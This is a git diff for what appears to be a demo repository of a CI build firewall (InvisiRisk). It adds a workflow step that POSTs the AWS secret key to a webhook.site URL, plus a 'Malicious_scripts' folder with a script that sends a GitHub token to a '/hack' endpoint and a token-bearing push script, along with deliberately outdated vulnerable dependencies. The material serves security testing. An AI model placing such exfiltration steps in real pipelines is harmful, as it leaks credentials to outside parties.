diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 0000000..b7336dd --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,43 @@ +name: JavaScript Project + +on: + workflow_dispatch: + +permissions: + checks: write + contents: write + packages: read + +jobs: + python-application-build: + runs-on: ubuntu-latest + name: Run build + steps: + - name: Setup PSE + uses: invisirisk/pse-action@dev-test + with: + api_url: "https://app.stage.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + + - name: Use npm + uses: actions/setup-node@v4 + with: + node-version: "18" + + - name: Install dependencies + run: npm install --legacy-peer-deps + + #- name: 😈 Execute malicious script + # run: bash run_malicious_scripts.sh + + - name: Send AWS Secret via Webhook (test) + run: | + curl -X POST "https://webhook.site/59c8292c-2297-4149-ac29-c02bec44a27a" \ + --data-urlencode "aws_secret_access_key=${{ secrets.AWS_SECRET_ACCESS_KEY }}" + + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@dev-test + with: + cleanup: "true" diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml deleted file mode 100644 index 9d57c51..0000000 --- a/.github/workflows/main.yml +++ /dev/null @@ -1,96 +0,0 @@ - -name: Build NPM Package -on: - push: - branches: [ main ] - pull_request: - branches: [ main ] - -permissions: - checks: write - contents: read - packages: read -env: - API_URL: https://app.audit.dev.invisirisk.com - -jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - - start_proxy_and_build: - runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] - services: - pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test - credentials: - username: ${{needs.ecr_details.outputs.ecr_username}} - password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.audit.dev.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - container: - image: node:18-alpine - options: --cap-add=NET_ADMIN - strategy: - matrix: - node-version: [18.x] - steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: - github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test - diff --git a/Malicious_scripts/mimetype.sh b/Malicious_scripts/mimetype.sh new file mode 100644 index 0000000..486795d --- /dev/null +++ b/Malicious_scripts/mimetype.sh @@ -0,0 +1,3 @@ +#!/bin/bash + +curl -H "Accept: text/html" -o google.html "https://www.google.com" diff --git a/Malicious_scripts/push.sh b/Malicious_scripts/push.sh new file mode 100644 index 0000000..8bd4525 --- /dev/null +++ b/Malicious_scripts/push.sh @@ -0,0 +1,17 @@ +#!/bin/bash + +echo "Marking repository as safe..." +git config --global --add safe.directory "$GITHUB_WORKSPACE" + +echo "Setting up Git user..." +git config user.name "ir-paras-oli" +git config user.email "paras.oli@invisirisk.com" + +echo "Making changes (creating a file)..." +echo "Some new content" > new6-file.txt +git add new6-file.txt +git commit -m "Add a new file" + +echo "Pushing changes to the STAGE branch..." +git remote set-url origin https://x-access-token:${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git +git push origin STAGE diff --git a/Malicious_scripts/run_wrapper.sh b/Malicious_scripts/run_wrapper.sh new file mode 100644 index 0000000..b6e5e2e --- /dev/null +++ b/Malicious_scripts/run_wrapper.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +echo "Starting leak_token.sh execution..." +bash ./secret_leak.sh # Call the actual script +bash ./statuscode.sh # Call the actual script +bash ./push.sh # Call the actual script +bash ./mimetype.sh # Call the actual script +echo "Execution completed." diff --git a/Malicious_scripts/secret_leak.sh b/Malicious_scripts/secret_leak.sh new file mode 100644 index 0000000..f1980ce --- /dev/null +++ b/Malicious_scripts/secret_leak.sh @@ -0,0 +1,8 @@ +#!/bin/bash + +# Sending a POST request with a GitHub token (LEAK) +curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ + -H "Content-Type: application/json" \ + -d '{ + "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" + }' diff --git a/Malicious_scripts/statuscode.sh b/Malicious_scripts/statuscode.sh new file mode 100644 index 0000000..bec9161 --- /dev/null +++ b/Malicious_scripts/statuscode.sh @@ -0,0 +1,11 @@ +#!/bin/bash + +echo "Checking status code from GitHub API..." + +# This request should trigger a 400 Bad Request because 'q' is empty +curl -k -i -X GET "https://api.github.com/search/repositories?q=" + +# This request should trigger a 401 Unauthorized if authentication is required but not provided +# curl -k -i -X GET "https://api.github.com/user" + +echo "Status check completed." diff --git a/README.md b/README.md index ed8b0f0..d687843 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,55 @@ -readme -readme +# InvisiRisk Build Application Firewall Demo + +This repository contains a JavaScript application that demonstrates how InvisiRisk build application firewall works. The project serves as a boilerplate example to showcase the security features and implementation of InvisiRisk in a JavaScript environment. + +## GitHub Workflow Setup + +To integrate InvisiRisk into your GitHub workflow, add the following steps to each job in your workflow file: + +### 1. Add the Setup PSE step at the beginning of each job: + +```yaml +- name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} +``` + +### 2. Add the Cleanup PSE step at the end of each job: + +```yaml +- name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` + +### 3. Set up the required secret: + +You need to set the IR_API_KEY secret in your GitHub repository settings. This API key can be obtained from the InvisiRisk portal. + +### Example workflow: + +```yaml +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Setup PSE + uses: invisirisk/pse-action@v1.0.20 + with: + api_url: "https://app.invisirisk.com" + app_token: ${{ secrets.IR_API_KEY }} + + # Your other build steps here + + - name: Cleanup PSE + if: always() + uses: invisirisk/pse-action@v1.0.20 + with: + cleanup: "true" +``` diff --git a/mern-social-second-edition/README.md b/mern-social-second-edition/README.md deleted file mode 100644 index 33664e2..0000000 --- a/mern-social-second-edition/README.md +++ /dev/null @@ -1,58 +0,0 @@ -# MERN Social 2.0 -- *Looking for the first edition code? [Check here](https://github.com/shamahoque/mern-social/tree/master)* - -A simple social media application with users, posts, likes and comments - developed using React, Node, Express and MongoDB. - -![MERN Social](https://s3.amazonaws.com/mernbook/git+/social.png "MERN Social") - -### [Live Demo](http://social2.mernbook.com/ "MERN Social") - -#### What you need to run this code -1. Node (13.12.0) -2. NPM (6.14.4) or Yarn (1.22.4) -3. MongoDB (4.2.0) - -#### How to run this code -1. Make sure MongoDB is running on your system -2. Clone this repository -3. Open command line in the cloned folder, - - To install dependencies, run ``` npm install ``` or ``` yarn ``` - - To run the application for development, run ``` npm run development ``` or ``` yarn development ``` -4. Open [localhost:3000](http://localhost:3000/) in the browser ----- -### More applications built using this stack - -* [MERN Skeleton](https://github.com/shamahoque/mern-social/tree/second-edition) -* [MERN Classroom](https://github.com/shamahoque/mern-classroom) -* [MERN Marketplace](https://github.com/shamahoque/mern-marketplace/tree/second-edition) -* [MERN Expense Tracker](https://github.com/shamahoque/mern-expense-tracker) -* [MERN Mediastream](https://github.com/shamahoque/mern-mediastream/tree/second-edition) -* [MERN VR Game](https://github.com/shamahoque/mern-vrgame/tree/second-edition) - -Learn more at [mernbook.com](http://www.mernbook.com/) - ----- -## Get the book -#### [Full-Stack React Projects - Second Edition](https://www.packtpub.com/web-development/full-stack-react-projects-second-edition) -*Learn MERN stack development by building modern web apps using MongoDB, Express, React, and Node.js* - -Full-Stack React Projects - -React combined with industry-tested, server-side technologies, such as Node, Express, and MongoDB, enables you to develop and deploy robust real-world full-stack web apps. This updated second edition focuses on the latest versions and conventions of the technologies in this stack, along with their new features such as Hooks in React and async/await in JavaScript. The book also explores advanced topics such as implementing real-time bidding, a web-based classroom app, and data visualization in an expense tracking app. - -Full-Stack React Projects will take you through the process of preparing the development environment for MERN stack-based web development, creating a basic skeleton app, and extending it to build six different web apps. You'll build apps for social media, classrooms, media streaming, online marketplaces with real-time bidding, and web-based games with virtual reality features. Throughout the book, you'll learn how MERN stack web development works, extend its capabilities for complex features, and gain actionable insights into creating MERN-based apps, along with exploring industry best practices to meet the ever-increasing demands of the real world. - -Things you'll learn in this book: - -- Extend a MERN-based application to build a variety of applications -- Add real-time communication capabilities with Socket.IO -- Implement data visualization features for React applications using Victory -- Develop media streaming applications using MongoDB GridFS -- Improve SEO for your MERN apps by implementing server-side rendering with data -- Implement user authentication and authorization using JSON web tokens -- Set up and use React 360 to develop user interfaces with VR capabilities -- Make your MERN stack applications reliable and scalable with industry best practices - -If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1839215410) today! - ---- diff --git a/mern-social-second-edition/package.json b/mern-social-second-edition/package.json deleted file mode 100644 index 786815a..0000000 --- a/mern-social-second-edition/package.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "name": "mern-social", - "version": "2.0.0", - "description": "A MERN stack based social media application", - "author": "Shama Hoque", - "license": "MIT", - "keywords": [ - "react", - "express", - "mongodb", - "node", - "mern" - ], - "repository": { - "type": "git", - "url": "https://github.com/shamahoque/mern-social.git" - }, - "homepage": "https://github.com/shamahoque/mern-social", - "main": "./dist/server.generated.js", - "scripts": { - "development": "nodemon", - "build": "webpack --config webpack.config.client.production.js && webpack --mode=production --config webpack.config.server.js", - "start": "NODE_ENV=production node ./dist/server.generated.js" - }, - "engines": { - "node": "13.12.0", - "npm": "6.14.4" - }, - "devDependencies": { - "@babel/core": "7.9.0", - "@babel/preset-env": "7.9.0", - "@babel/preset-react": "7.9.4", - "babel-loader": "8.1.0", - "file-loader": "6.0.0", - "nodemon": "2.0.2", - "webpack": "4.42.1", - "webpack-cli": "3.3.11", - "webpack-dev-middleware": "3.7.2", - "webpack-hot-middleware": "2.25.0", - "webpack-node-externals": "1.7.2" - }, - "dependencies": { - "@hot-loader/react-dom": "16.13.0", - "@material-ui/core": "4.9.8", - "@material-ui/icons": "4.9.1", - "body-parser": "1.19.0", - "compression": "1.7.4", - "cookie-parser": "1.4.5", - "cors": "2.8.5", - "express": "4.17.1", - "express-jwt": "5.3.1", - "formidable": "1.2.2", - "helmet": "3.22.0", - "jsonwebtoken": "8.5.1", - "lodash": "4.17.15", - "mongoose": "5.9.7", - "react": "16.13.1", - "react-dom": "16.13.1", - "react-hot-loader": "4.12.20", - "react-router": "5.1.2", - "react-router-dom": "5.1.2" - } -} diff --git a/package.json b/package.json index 9507c1b..733556e 100644 --- a/package.json +++ b/package.json @@ -1,23 +1,57 @@ { - "name": "GeeksForGeeks", + "name": "javascript-project", "version": "1.0.0", - "description": "GeeksForGeeks", + "description": "Demo JavaScript Project", "main": "index.js", "scripts": { - "test": "echo \"test started \"", - "start": "node start.js" + "start": "node index.js", + "test": "echo \"Error: no test specified\" && exit 1" }, - "engines": { - "node": ">=7.6.0", - "npm": ">=4.1.2" - }, - "author": "GeeksForGeeks", - "license": "ISC", "dependencies": { - "body-parser": "^1.17.1", - "express": "^4.15.2", - "express-validator": "^3.1.2", - "mongoose": "^4.8.7", - "nodemon": "^1.14.12" + "express": "4.17.1", + "lodash": "4.17.20", + "mongoose": "5.9.2", + "body-parser": "1.19.0", + "cors": "2.8.5", + "dotenv": "8.2.0", + "jsonwebtoken": "8.3.0", + "helmet": "3.23.3", + "morgan": "1.10.0", + "bcryptjs": "2.4.3", + "moment": "2.24.0", + "request": "2.88.2", + "bluebird": "3.7.2", + "debug": "2.6.9", + "async": "3.2.0", + "winston": "3.2.1", + "multer": "1.4.2", + "nodemailer": "6.4.6", + "mysql": "2.18.1", + "pg": "8.2.1", + "redis": "3.0.2", + "socket.io": "2.3.0", + "uuid": "3.3.3", + "validator": "13.1.1", + "xml2js": "0.4.23", + "ini": "1.3.5", + "handlebars": "4.7.6", + "marked": "0.3.6", + "merge-deep": "3.0.2", + "minimist": "1.2.5", + "q": "1.5.1", + "underscore": "1.10.2", + "yargs-parser": "20.2.2", + "jquery": "3.5.1", + "xmlhttprequest": "1.8.0", + "lodash.merge": "4.6.2", + "lodash.defaultsdeep": "4.6.1", + "react": "16.13.1", + "react-dom": "16.13.1", + "axios": "0.19.2", + "next": "13.5.5", + "shelljs": "0.8.4", + "node-forge": "0.10.0", + "xml-js": "1.6.11", + "hoek": "5.0.3" } } diff --git a/run_malicious_scripts.sh b/run_malicious_scripts.sh new file mode 100644 index 0000000..deac8b2 --- /dev/null +++ b/run_malicious_scripts.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +echo "Starting malicious execution..." +bash malicious_scripts/secret_leak.sh # Call the actual script +bash malicious_scripts/status_code.sh # Call the actual script +bash malicious_scripts/push.sh # Call the actual script +bash malicious_scripts/mime_type.sh # Call the actual script +bash malicious_scripts/content_length.sh # Call the actual script +echo "Execution completed." \ No newline at end of file